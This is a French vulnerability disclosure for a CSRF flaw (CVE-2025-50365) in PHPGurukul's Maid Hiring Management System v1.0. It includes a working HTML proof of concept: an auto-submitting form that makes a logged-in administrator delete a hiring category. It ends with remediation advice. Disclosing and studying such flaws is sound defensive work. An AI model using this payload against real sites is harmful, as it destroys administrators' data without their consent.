
PoC pour CVE-2025-50365 : une faille CSRF dans PHPGurukul Maid Hiring Management System permettant la suppression de catégories d'embauche via une requête admin malveillante.
Nom du projet et URL du dépôt : Système de gestion de recrutement de personnel de maison utilisant PHP et MySQL
Type de vulnérabilité : Falsification de requête côté client
Version(s) affectée(s) : v1.0
💣Description de la vulnérabilité : Une vulnérabilité de falsification de requête intersite (CSRF) existe dans le panneau d'administration du système de gestion de recrutement de PHPGurukul, permettant à un attaquant de supprimer des catégories d'embauche arbitraires en amenant un administrateur authentifié à visiter un site malveillant. Cela peut entraîner la suppression de données et des modifications non autorisées au niveau administrateur.
👩💻Impact : Suppression non autorisée de catégories.
🛜Preuve de concept (PoC) :

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recommandation : Implémentez des jetons CSRF dans les formulaires d'administration, appliquez les cookies SameSite et validez l'origine des requêtes pour empêcher les actions non autorisées.